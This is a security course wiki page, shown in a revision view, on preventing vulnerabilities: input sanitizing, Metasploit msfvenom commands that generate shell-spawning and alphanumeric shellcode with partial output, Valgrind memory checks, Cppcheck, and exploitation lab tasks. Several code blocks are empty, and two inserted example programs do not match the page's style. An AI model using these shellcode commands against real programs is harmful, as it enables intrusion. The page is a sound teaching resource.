session:extra:preventing-vulnerabilities [2016/06/20 16:14]
Razvan Deaconescu [0x0D. Detecting Vulnerabilities]
session:extra:preventing-vulnerabilities [2020/07/19 12:49] (current)
====== 0x0D. Preventing Vulnerabilities ======

===== Slides =====

<note warning>
</note>
  
===== Tutorials =====

==== Sanitizing Input ====

Invalid input may cause a program to crash. Input may also consist of content that exploits vulnerabilities in programs; among the most famous forms of input that causes exploits is [[https://www.owasp.org/index.php/SQL_Injection|SQL injection]]. If the developer does not check the input, then an SQL select query may reveal private information to the attacker. One needs to validate input and make sure it follows a valid format.
Consider the case of a web application that receives HTTP queries. It may be that a form requires the user to input alphanumeric characters. The user, however, enters a binary shellcode string and then uses it to exploit a vulnerability in the web application and launch a shell or run a different command. A careful programmer would sanitize input and make sure the username is alphanumeric. It is, however, possible to bypass such a check by using an [[http://www.blackhatlibrary.net/Shellcode/Alphanumeric|alphanumeric shellcode]].
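As an added example (not code from the original page), the following C function implements the allowlist check the paragraph describes: it accepts only non-empty ASCII alphanumeric strings up to a 64-byte limit. The function name and the limit are assumptions made here, not values from the page.

```c
/* Added example, not code from the original page: an allowlist check for a
 * username field that must be alphanumeric. The function name and the
 * 64-byte limit are assumptions made for this example. */
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>

#define MAX_USERNAME_LEN 64   /* assumed bound; the page states none */

/* Returns 1 if `input` is a non-empty, NUL-terminated string of at most
 * MAX_USERNAME_LEN bytes made only of ASCII letters and digits; 0 otherwise.
 * Everything not explicitly allowed is rejected, so binary payload bytes,
 * separators, whitespace and overlong inputs all fail the check. */
int is_valid_username(const char *input)
{
    if (input == NULL)
        return 0;

    /* Bounded scan: never read more than MAX_USERNAME_LEN + 1 bytes, so a
     * missing terminator cannot run the check off the end of the buffer. */
    size_t len = 0;
    while (len <= MAX_USERNAME_LEN && input[len] != '\0')
        len++;
    if (len == 0 || len > MAX_USERNAME_LEN)
        return 0;

    for (size_t i = 0; i < len; i++) {
        /* Cast to unsigned char: isalnum() on a negative char is undefined
         * behaviour, and bytes >= 0x80 are common in binary shellcode. */
        unsigned char c = (unsigned char)input[i];
        if (c >= 0x80 || !isalnum(c))
            return 0;
    }
    return 1;
}

int main(void)
{
    /* Constructed sample inputs. The last one is a purely alphanumeric
     * string in the style of the alpha_mixed output shown on this page:
     * a character-class check accepts it, so validation alone is not a fix. */
    const char *samples[] = { "alice42", "", "alice;--", "a\x90\xcd\x80",
                              "IIIIIIIII7QZjAXP0A0A" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-20s -> %s\n", samples[i],
               is_valid_username(samples[i]) ? "accept" : "reject");
    return 0;
}
```

Two details matter in practice: the cast to unsigned char before isalnum(), because a plain char holding a byte of 0x80 or above is negative on most platforms and passing it to isalnum() is undefined behaviour; and the bounded scan, so that validating an unterminated buffer cannot itself become an out-of-bounds read. The last sample input shows the limit of character-class validation: an alphanumeric string passes it, which is exactly the gap an alphanumeric shellcode uses, so the underlying memory-safety bug still has to be fixed.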
  
=== Alphanumeric Shellcode ===
  
An alphanumeric shellcode is a shellcode that consists solely of alphanumeric characters and may therefore pass a sanitizing check on a string. Alphanumeric shellcodes are larger because they can only use a restricted set of instructions, for example repeatedly incrementing a register to reach a certain value.
  
The Metasploit framework is among the simplest ways of obtaining shellcodes and alphanumeric shellcodes. Metasploit is already installed on your Kali machines. However, if manual installation is needed, one would use the instructions [[http://www.linuxx.eu/2014/01/install-metasploit-on-debian.html|here]] (on Debian-based systems) or [[https://wiki.archlinux.org/index.php/Metasploit_Framework|here]] (Arch).
  
For example, in order to get an alphanumeric shellcode we would use the [[https://www.offensive-security.com/metasploit-unleashed/msfvenom/|msfvenom]] Metasploit command.
  
The use of the ''-h'' option provides a list of options for the command:<code>
student@sss-vm:/opt/metasploit-framework.git$ msfvenom -h
MsfVenom - a Metasploit standalone payload generator.
Also a replacement for msfpayload and msfencode.
</code>
  
In order to list available payloads one would use the command<code>
student@sss-vm:/opt/metasploit-framework.git$ msfvenom -l payloads | head

Framework Payloads (428 total)
</code>
  
The complete command for creating an alphanumeric shellcode that spawns a shell:<code>
student@sss-vm:/opt/metasploit-framework.git$ msfvenom -p linux/x86/exec CMD=/bin/sh -f python
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
buf += "\x89\xe1\xcd\x80"

student@sss-vm:/opt/metasploit-framework.git$ msfvenom -p linux/x86/exec CMD=/bin/sh -e x86/alpha_mixed -f python
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
</code>
  
This is because these instructions need a way of computing the current position of the shellcode. This may be solved by making a register (ECX, for example) point to the beginning of the shellcode buffer. If that is possible in the program, then the shellcode may be instructed to fetch its address from that register:<code>
student@sss-vm:/opt/metasploit-framework.git$ msfvenom -p linux/x86/exec CMD=/bin/sh -e x86/alpha_mixed -f python BufferRegister=ECX
No platform was selected, choosing Msf::Module::Platform::Linux from the payload
No Arch selected, selecting Arch: x86 from the payload
IIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIazTKV8z9sb3VPh6MCSk9JGE8TobSqxGpPhdosRrI2NnikSaBKXTHWps0C0vO52pipnDoCCphgpRw63LIkQZmOpAA
</code>

==== Detecting memory errors with Valgrind ====
  
Valgrind is a multipurpose code profiling and memory debugging tool for Linux. It allows you to run your program in Valgrind's own environment that monitors memory usage such as calls to malloc and free (or new and delete in C++). If you use uninitialized memory, write off the end of an array, or forget to free a pointer, Valgrind can detect it.
  
=== Running Valgrind memcheck ===

<code bash>
</code>
  
=== Interpreting errors ===

Memcheck issues a range of error messages. This section presents a quick summary of what the error messages mean. The precise behaviour of the error-checking machinery is described [[http://valgrind.org/docs/manual/mc-manual.html#mc-manual.machine|here]].

== Illegal read / Illegal write errors ==
  
Take the following error:

Note that Memcheck only tells you that your program is about to access memory at an illegal address. It can't stop the access from happening. So, if your program makes an access which normally would result in a segmentation fault, your program will still suffer the same fate -- but you will get a message from Memcheck immediately prior to this. In this particular example, reading junk on the stack is non-fatal, and the program stays alive.
  
== Use of uninitialised values ==

<code bash>
</code>
  * The contents of heap blocks (allocated with malloc, new, or a similar function) before you (or a constructor) write something there.
  
== Use of uninitialised or unaddressable values in system calls ==

Memcheck checks all parameters to system calls:

The program has (a) written uninitialised junk from the heap block to the standard output, and (b) passed an uninitialised value to exit. Note that the first error refers to the memory pointed to by buf (not buf itself), but the second error refers directly to exit's argument arr2[0].
  
== Illegal frees ==

<code bash>
</code>
Memcheck keeps track of the blocks allocated by your program with malloc/new, so it can know exactly whether or not the argument to free/delete is legitimate. Here, this test program has freed the same block twice. As with the illegal read/write errors, Memcheck attempts to make sense of the address freed. If, as here, the address is one which has previously been freed, you will be told that -- making duplicate frees of the same block easy to spot. You will also get this message if you try to free a pointer that doesn't point to the start of a heap block.
  
== When a heap block is freed with an inappropriate deallocation function ==
In the following example, a block allocated with new[] has wrongly been deallocated with free:

The reason behind the requirement is as follows. In some C++ implementations, delete[] must be used for objects allocated by new[] because the compiler stores the size of the array and the pointer-to-member to the destructor of the array's content just before the pointer actually returned. delete doesn't account for this and will get confused, possibly corrupting the heap.
  
== Overlapping source and destination blocks ==
The following C library functions copy some data from one memory block to another (or something similar): memcpy, strcpy, strncpy, strcat, strncat. The blocks pointed to by their src and dst pointers aren't allowed to overlap. The POSIX standards have wording along the lines "If copying takes place between objects that overlap, the behavior is undefined." Therefore, Memcheck checks for this.

You don't want the two blocks to overlap because one of them could get partially overwritten by the copying.
  
== Memory leak detection ==

Memcheck keeps track of all heap blocks issued in response to calls to malloc/new et al. So when the program exits, it knows which blocks have not been freed.

The first message describes a simple case of a single 8 byte block that has been definitely lost. The second case mentions another 8 byte block that has been definitely lost; the difference is that a further 80 bytes in other blocks are indirectly lost because of this lost block. The loss records are not presented in any notable order, so the loss record numbers aren't particularly meaningful. The loss record numbers can be used in the Valgrind gdbserver to list the addresses of the leaked blocks and/or give more details about how a block is still reachable.
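The following program is an added example (not from the page or the Valgrind documentation) that puts several of the error classes above side by side: each buggy_ function triggers one Memcheck report (uninitialised bytes in a write() system call, a double free, an overlapping memcpy, a definitely lost block) and the safe_ function next to it is the corrected version. The C++ new[]/free mismatch is omitted because this is a C program; function names and the sample string are constructed for the example.

```c
/* Added example, not from the original page or the Valgrind manual. Each
 * buggy_* function triggers one Memcheck error class described above; the
 * safe_* function next to it is the corrected version. Names and sample
 * data are constructed for this example. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Uninitialised bytes reach a syscall ("Syscall param write(buf) points to
 * uninitialised byte(s)"): a fresh malloc block is written to stdout. */
void buggy_write_uninit(void)
{
    char *buf = malloc(8);
    ssize_t n = write(1, buf, 8);
    (void)n;
    free(buf);
}
/* Fixed: the block is fully initialised before the syscall. Returns 6. */
int safe_write_init(void)
{
    char *buf = calloc(8, 1);           /* zeroed, so no byte is undefined */
    if (!buf) return -1;
    memcpy(buf, "hello\n", 6);
    ssize_t n = write(1, buf, 6);
    free(buf);
    return (int)n;
}

/* Illegal free: the same block released twice ("Invalid free()"). */
void buggy_double_free(void)
{
    char *p = malloc(8);
    free(p);
    free(p);
}
/* Fixed: null the pointer after release; free(NULL) is a defined no-op. */
int safe_free_once(void)
{
    char *p = malloc(8);
    if (!p) return -1;
    free(p);
    p = NULL;
    free(p);
    return 0;
}

/* Overlapping blocks ("Source and destination overlap in memcpy"). */
void buggy_overlap(char *s)
{
    memcpy(s + 1, s, strlen(s) + 1);
}
/* Fixed: memmove is defined for overlapping blocks, and the capacity is
 * checked. Shifts the string right by one, puts '_' in front, returns the
 * new length, or -1 if the buffer cannot hold one more byte plus the NUL. */
int safe_shift_right(char *s, size_t cap)
{
    size_t len = strlen(s);
    if (len + 1 >= cap) return -1;
    memmove(s + 1, s, len + 1);         /* moves the terminator as well */
    s[0] = '_';
    return (int)(len + 1);
}

/* Leak: the only pointer to the block goes out of scope ("definitely lost"). */
void buggy_leak(void)
{
    char *p = malloc(8);
    strcpy(p, "leak");
}
/* Fixed: the allocation is released by the function that owns it. Returns 2. */
int safe_no_leak(void)
{
    char *p = malloc(8);
    if (!p) return -1;
    strcpy(p, "ok");
    int len = (int)strlen(p);
    free(p);
    return len;
}

int main(int argc, char **argv)
{
    char text[16] = "abcdef";           /* constructed sample string */
    if (argc > 1 && strcmp(argv[1], "buggy") == 0) {
        buggy_write_uninit();
        buggy_overlap(text);
        buggy_leak();
        buggy_double_free();            /* last: glibc may abort here */
        return 0;
    }
    safe_write_init();
    safe_shift_right(text, sizeof text);
    printf("shifted: %s, len: %d, free-once: %d\n",
           text, safe_no_leak(), safe_free_once());
    return 0;
}
```

Compile with gcc -g -O0 so the reports carry file and line numbers, then run valgrind --leak-check=full --track-origins=yes ./memcheck_demo buggy to get one report per buggy_ function; without the argument only the corrected paths run and Memcheck reports no errors and no lost blocks.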
  
==== Static Analysis ====

Static analysis can be done using a variety of tools, ranging from ''lint''-like analyzers to software suites that attempt to do full semantic analysis on the code. Wikipedia gives a comprehensive [[https://en.wikipedia.org/wiki/List_of_tools_for_static_code_analysis|list of static code analysis tools]] for various programming languages. One such useful tool is [[http://cppcheck.sourceforge.net/|Cppcheck]], which has been used to discover a [[http://tech.slashdot.org/story/14/01/08/1421235/23-year-old-x11-server-security-vulnerability-discovered|23-year-old vulnerability]] in the X11 server.
 </code> </code>
  
<note>Kali Linux currently ships the ''cppcheck'' package at version 1.74; alternatively, you can download the latest Cppcheck sources from [[http://sourceforge.net/projects/cppcheck/files/cppcheck|Sourceforge]] and compile them by simply running ''make''.</note>
  
Another well-known static analysis tool, used for detecting bugs and possible vulnerabilities, is [[http://www.coverity.com/|Coverity]]. Open source projects may be checked for free using [[https://scan.coverity.com/|Coverity Scan]]; all one needs to do is create an account. Coverity Scan is integrated with GitHub.

===== Tasks =====
  
==== Valgrind warm-up exercise ====
  
Download the following {{:session:session13_task1.tgz|archive}}. Compile the C source file contained within with gcc and use Valgrind to detect the possible memory errors. After detecting the errors, try to find the incorrect lines of code causing them and fix the problems.
  
==== Hunting memory errors in Nginx ====

Download the following {{:session:nginx-1.7.3-sss.tgz|archive}} containing a modified version of the Nginx web server. Compile the nginx web server and install it somewhere local:<code>
</code>
As done in the previous exercise, try to pinpoint the memory problem using Valgrind and then resolve it.
<note info>You may need to delve a bit into the nginx code and understand how it manages memory before attempting a fix.</note>

==== Shellcode, Sanitizing and Alphanumeric Shellcode ====
  
Use {{:session:shellcode-validation.zip|this archive}} for this task. Use ''make'' to create the ''show-banner-message'' executable file. In this task, you should disable ASLR:<code>
</code>
The shellcode will be passed as a byte array as an argument to the program. It will be stored in the ''message'' local variable. The address of the ''message'' local variable will be used as the address to overwrite the ''print_fn'' global function pointer, as stated above.
</note>

==== Static Analysis with Cppcheck ====
  
Use {{:session:checkme.zip|this archive}} for the task. Use ''make'' to create the ''checkme'' executable file.

Look through the source file. It consists of a function ''my_tokenize'', which is called from the main program multiple times. Run a basic ''cppcheck'' check on it.
  
Write a library configuration file that specifies that ''my_tokenize'''s first argument must be non-null and its second argument must have values between ''0'' and ''1024''. Use the [[http://cppcheck.sourceforge.net/manual.pdf|manual]] as a reference (''section 7: Library configuration'').
  
Run ''cppcheck'' again and tell it to load the newly created library file.
  
<note tip>
For a range, the correct construction is<code>
<valid>0:1024</valid>
</code>
although the manual specifies it as<code>
<valid>0-1024</valid>
</code>(that is, with ''-'' (minus) instead of '':'' (colon)).
</note>
  
=== Extra: io.smashthestack.org ===
  
Go through the first 6 levels of the [[http://io.smashthestack.org/|io.smashthestack.org wargame]]. If you feel up to it, solve the ''_alt'' versions of the challenges as well.

===== References =====
  * [[http://valgrind.org/docs/manual/mc-manual.html#mc-manual.machine|Details of Memcheck's checking machinery]]
session/extra/preventing-vulnerabilities.1466428469.txt.gz · Last modified: 2016/06/20 16:14 by Razvan Deaconescu